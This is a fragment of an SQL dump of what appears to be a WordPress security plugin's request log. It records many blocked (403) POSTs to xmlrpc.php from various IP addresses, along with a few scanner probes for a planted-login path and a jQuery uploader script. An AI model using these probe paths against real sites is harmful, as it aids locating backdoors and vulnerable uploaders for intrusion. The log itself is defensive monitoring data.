Firefox\\/57.0\"}','m51iYnr0UJL2Pldpzf7DAtyC',0,1681091038.6871,1561,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','3CpADkeSx15VzHMu9l2do7f0',0,1681091042.8482,742,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','BWSzZJkQIXVd8A7oeE5RgwFP',0,1681091052.0650,609,'','POST',403,0,515,0,1,'',0),('62.102.148.154',1046910106,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','X5jwmKqtHUWegLGfu8PzJaNi',0,1681091381.9934,3810,'','POST',403,0,515,0,1,'',0),('144.76.57.230',2420914662,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko\\/20100101 Firefox\\/52.0\"}','MX4OpTW7lfokt05INqPVmAY2',0,1681091498.4961,2555,'','POST',403,0,515,0,1,'',0),('185.98.5.176',3110208944,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','Xl6FIwjNWURbZLOkdBPsKun2',0,1681091504.7863,721,'','POST',403,0,515,0,1,'',0),('81.181.130.56',1370849848,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','MtR41PpzUNESGvdrZgyQFALJ',0,1681091510.8086,651,'','POST',403,0,515,0,1,'',0),('68.183.179.155',1152889755,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','9aNKvTYcJRjM6HUL7P1Xwq8s',0,1681091517.0361,693,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','UherJRa3AYkXdbB7cxs2DEPH',0,1681091521.2791,692,'','POST',403,0,515,0,1,'',0),('78.111.2.100',1315897956,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','yJI1ZDqw4CBuM7bi60QS5jGt',0,1681091524.5542,701,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','X2W0CrNvVcybBkqpjGoJ6TLw',0,1681091536.6606,577,'','POST',403,0,515,0,1,'',0),('128.127.105.184',2155833784,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','QckN92VByjnRgfCY7reptTmd',0,1681091722.4607,3320,'','POST',403,0,515,0,1,'',0),('194.187.251.115',3267099507,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','sIzpmF9EMW5xjTvOHtebYPgn',0,1681092230.0867,3747,'','POST',403,0,515,0,1,'',0),('213.152.162.181',3583550133,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','mMHkvFTWc5rOqLyJQpPxZI1j',0,1681093636.6299,732,'','POST',403,0,515,0,1,'',0),('175.178.36.28',2947687452,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','hFTR6fkvPdSst90jpwW2ul8M',0,1681095234.8888,3776,'','POST',403,0,515,0,1,'',0),('185.141.106.144',3113052816,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','LTkzNjUCtoJF5Op3fqsHud7n',0,1681095240.2497,589,'','POST',403,0,515,0,1,'',0),('51.75.54.240',860567280,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko\\/20100101 Firefox\\/17.0\"}','YL8MbkGDlIXTWZzwRp3snvJN',0,1681095248.3871,1256,'','POST',403,0,515,0,1,'',0),('198.71.235.60',3326602044,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','l62gh1bIwHFMzQsny9dmZrAR',0,1681095248.7553,1125,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','IRtWKxbhMDPdT3Veu65BZUaz',0,1681095261.0118,1147,'','POST',403,0,515,0,1,'',0),('8.210.238.120',148041336,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','H0IvYenuw7zfNsroUaTOi5Gh',0,1681095261.3499,1168,'','POST',403,0,515,0,1,'',0),('134.122.42.249',2256153337,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','fgkt7pDeZhJNMm2dGsVIAb1X',0,1681095266.0706,590,'','POST',403,0,515,0,1,'',0),('142.93.223.16',2388516624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','J18rLdZtMi9GY6Qnv2m0eHyU',0,1681095272.5448,1215,'','POST',403,0,515,0,1,'',0),('103.92.235.82',1734142802,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','AQqnULc07hF8ag3ZG4WdpXKP',0,1681095278.6775,640,'','POST',403,0,515,0,1,'',0),('209.58.183.78',3510286158,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','uENhnZJ2KymI0jgDb1sCd9rz',0,1681095640.6226,1417,'','POST',403,0,515,0,1,'',0),('185.200.116.219',3116922075,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','03shkpXBSWogqjUzvbxJKtew',0,1681096614.3955,3961,'','POST',403,0,515,0,1,'',0),('213.152.161.20',3583549716,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','fJXEBy6d5lZjaRVFrDmCGgx9',0,1681096967.8316,692,'','POST',403,0,515,0,1,'',0),('134.19.179.139',2249438091,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qWK4yigO6IG0jD1lX3hJxSTw',0,1681098537.2646,3877,'','POST',403,0,515,0,1,'',0),('104.254.90.243',1761499891,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','KnLIeGW9kNv40Em7XQOz6RhC',0,1681098675.2833,3458,'','POST',403,0,515,0,1,'',0),('134.19.179.211',2249438163,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','dlfX8Ur3Q9jMoYZHgVWwvNLy',0,1681101773.1236,3685,'','POST',403,0,515,0,1,'',0),('95.216.148.85',1608029269,'','http://cmdev-site1.com/wp-content/plugins/w0rdpr3ssnew/wp-login.php','','{\"1\":\"Mozlila\\/5.0 (Linux; Android 7.0; SM-G892A Bulid\\/NRD90M; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/60.0.3112.107 Moblie Safari\\/537.36\",\"2\":\"www.google.com\"}','VAvOBrl4hgHfwN8moRIKpPCb',0,1681102277.9814,1845,'','GET',403,0,700,0,1,'',0),('213.152.161.20',3583549716,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','JagmCvpD5yPhWVQwbezAilrd',0,1681102549.4568,5503,'','POST',403,0,515,0,1,'',0),('113.190.234.69',1908337221,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.163 Safari\\/537.36\"}','sRprnm281OY39v6VbfyL4Xdi',0,1681103196.7036,1836,'','POST',403,0,515,0,1,'',0),('184.168.96.211',3098042579,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','CEtl1hneOKpIyF94J5Df2VTq',0,1681103195.4757,3747,'','POST',403,0,515,0,1,'',0),('207.180.210.110',3484734062,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.141 Safari\\/537.36\"}','OHAiUmLvoKeRpthBqZ6Qr9as',0,1681103199.9372,599,'','POST',403,0,515,0,1,'',0),('156.224.21.75',2631931211,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','lkqgVNw4BdPhcsCXtpAuIfm3',0,1681103205.7587,584,'','POST',403,0,515,0,1,'',0),('185.141.106.144',3113052816,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','emu2SwR7yWBXvG68OLpt5zxD',0,1681103206.4984,559,'','POST',403,0,515,0,1,'',0),('52.139.225.218',881582554,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','CpVTg0Al2DP8MeniWcSGLZyI',0,1681103219.4151,748,'','POST',403,0,515,0,1,'',0),('68.183.83.210',1152865234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','x1bZmj39MUNFtp7aBXsqfnyQ',0,1681103220.1422,713,'','POST',403,0,515,0,1,'',0),('159.223.71.186',2682210234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','Pah8mpoMQCsxA6R5btfHEOJS',0,1681103220.9028,609,'','POST',403,0,515,0,1,'',0),('184.75.221.59',3091979579,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','2t1XvMJYoZPTEmLpnefdFBb0',0,1681104312.7433,3551,'','POST',403,0,515,0,1,'',0),('178.162.204.238',2997013742,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','m2oLw95qMuSVJUO8t4ANzQBD',0,1681104764.3915,3542,'','POST',403,0,515,0,1,'',0),('37.46.117.90',623801690,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','0ENd9vZaMFIToniGRBOpwfDk',0,1681105247.0093,3774,'','POST',403,0,515,0,1,'',0),('92.205.3.167',1556939687,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','7p6XOEvwAykWxDVl2dz4UNmi',0,1681105719.3280,4523,'','POST',403,0,515,0,1,'',0),('130.69.94.131',2185584259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','jSmGa3QhfF7DJxZwvsrzClWR',0,1681105725.0584,2590,'','POST',403,0,515,0,1,'',0),('213.152.161.249',3583549945,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','lYra6G0okXwEVZhu3LnfgdHm',0,1681106192.7100,3667,'','POST',403,0,515,0,1,'',0),('213.152.161.249',3583549945,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qfN2zE1IXaQspjMd4nurimAo',0,1681106198.3866,578,'','POST',403,0,515,0,1,'',0),('213.152.187.220',3583556572,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','3S0cgGORQkyPsxKZhd9uAWvb',0,1681106291.4520,1415,'','POST',403,0,515,0,1,'',0),('35.240.237.113',602991985,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','bhOpukjY5JxH8gdiQmNDFR4f',0,1681106737.4371,2623,'','POST',403,0,515,0,1,'',0),('68.183.144.184',1152880824,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','4hdomBFuDcTOEwiZt8pgl90Y',0,1681106739.0110,1671,'','POST',403,0,515,0,1,'',0),('103.130.218.158',1736628894,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','73ST2yaZkhdwWfQO0rUgMiCl',0,1681106736.7124,4131,'','POST',403,0,515,0,1,'',0),('103.251.44.226',1744514274,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','3L0axwoiqtcEXBPZHk1NuAbO',0,1681107415.8108,2260,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','IHndaKqVBXv28ofbw1gcpD4x',0,1681107418.1661,600,'','POST',403,0,515,0,1,'',0),('184.168.115.25',3098047257,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','9xl0PE5MbomzhOdtaRqrNwUL',0,1681107423.5118,633,'','POST',403,0,515,0,1,'',0),('142.93.223.16',2388516624,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','RuPOZAgaCqGtLIzSjevoVk4Y',0,1681107426.9263,585,'','POST',403,0,515,0,1,'',0),('143.42.194.250',2401944314,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','zUkwbct0smIeCT1p9OZo6QEq',0,1681107432.5750,1573,'','POST',403,0,515,0,1,'',0),('13.75.144.52',223055924,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/83.0.4103.116 Safari\\/537.36\"}','J8Y7ehfrRcgXdm526s0LT9bA',0,1681107434.0683,1069,'','POST',403,0,515,0,1,'',0),('191.96.52.4',3210753028,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','o2OtXDMimwSjGQZN7rVcPy1e',0,1681107445.9209,593,'','POST',403,0,515,0,1,'',0),('67.23.226.46',1125638702,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','ExORbCHMfBz65Xc9k1TtpYlQ',0,1681107450.4809,594,'','POST',403,0,515,0,1,'',0),('185.182.56.188',3115727036,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','EpGWl3J7R10tO6r2AqkygPsF',0,1681107458.8856,593,'','POST',403,0,515,0,1,'',0),('192.114.164.226',3228738786,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','dtwkYB0XLi5pQ4mWcVFrRy9E',0,1681107461.7724,570,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','IHhNBEWSQfa4bmDsLFOZYR1y',0,1681108023.8445,13299,'','POST',403,0,515,0,1,'',0),('159.203.161.65',2680922433,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','FPDIp1B03GmMeYsSgw6JKjQr',0,1681108031.5611,12081,'','POST',403,0,515,0,1,'',0),('216.128.130.149',3632300693,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','hKUxrPIocQA2v4Tkj0bq9tCB',0,1681108033.7611,11184,'','POST',403,0,515,0,1,'',0),('68.178.145.131',1152553347,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','DqkjVN2Z5IsclbJnaCfYTRw7',0,1681108043.3387,9700,'','POST',403,0,515,0,1,'',0),('194.233.85.167',3270071719,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','846OybkTFXcrQYf9Ng72ejLH',0,1681108051.3476,7396,'','POST',403,0,515,0,1,'',0),('157.230.114.25',2649125401,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','8ikJVdC4W3MavGK9emnNHUq6',0,1681108053.4471,5612,'','POST',403,0,515,0,1,'',0),('130.69.94.131',2185584259,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','UB8NmWvHTSgeLj4RyiqEzZ1G',0,1681108061.8839,734,'','POST',403,0,515,0,1,'',0),('103.130.218.158',1736628894,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','rjwRMW76S2aTHImgsNcUlJeK',0,1681108072.2206,717,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','YVc5RW2IyUNB8KdFP6zoXEre',0,1681108073.7270,621,'','POST',403,0,515,0,1,'',0),('144.24.100.136',2417517704,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/81.0.4044.138 Safari\\/537.36\"}','v56gP2BjduUsGImYOX1TyHZw',0,1681108082.7846,1471,'','POST',403,0,515,0,1,'',0),('203.154.39.241',3415877617,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','E4KnkUqL7tOdp2zbRP3Yeow0',0,1681108082.7849,1487,'','POST',403,0,515,0,1,'',0),('65.21.239.153',1091956633,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A102U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','HhZuVTM4t7IkWcdEsN2URjlX',0,1681108089.9685,689,'','POST',403,0,515,0,1,'',0),('37.120.132.83',628655187,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Y0RBmqCg65HoMG1UiJ9nwt7k',0,1681108253.2848,3979,'','POST',403,0,515,0,1,'',0),('194.187.251.155',3267099547,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','GL4jYHmCRwxhg7Fk0fTEi56J',0,1681109103.6906,4762,'','POST',403,0,515,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/assets/global/plugins/jquery_uploader/server/php/index.php?file=tf2rghf.jpg','','{\"1\":\"ALittle Client\"}','Fj4K0n23osTabDZMkqw8XcAf',0,1681109478.6762,1876,'','GET',403,0,700,0,1,'',0),('194.38.23.179',3257276339,'','http://cmdev-site1.com/public/assets/jquery_uploader/server/php/index.php?file=tf2rghf.jpg','','{\"1\":\"ALittle Client\"}','mLuV9UQYy357TfiZ8Pj4tw6C',0,1681109479.8812,821,'','GET',403,0,700,0,1,'',0),('31.3.152.100',520329316,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','rWHzyEDo41RbNTjvUuf9nxVJ',0,1681110120.8137,3981,'','POST',403,0,515,0,1,'',0),('31.3.152.100',520329316,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','j0NEImHtPhfZQs2xkK17Orzi',0,1681110270.4726,2947,'','POST',403,0,515,0,1,'',0),('213.152.161.30',3583549726,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','6wF2oAHjKGt8CkXyahqNlLD4',0,1681111875.7941,4159,'','POST',403,0,515,0,1,'',0),('213.152.161.30',3583549726,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','fE1LSQTvdnNjWikYHGoD2yaZ',0,1681111884.6581,571,'','POST',403,0,515,0,1,'',0),('213.152.162.154',3583550106,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Zh7i2putkdxJaLysFNMWX0m8',0,1681112876.0653,3912,'','POST',403,0,515,0,1,'',0),('217.151.98.163',3650577059,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 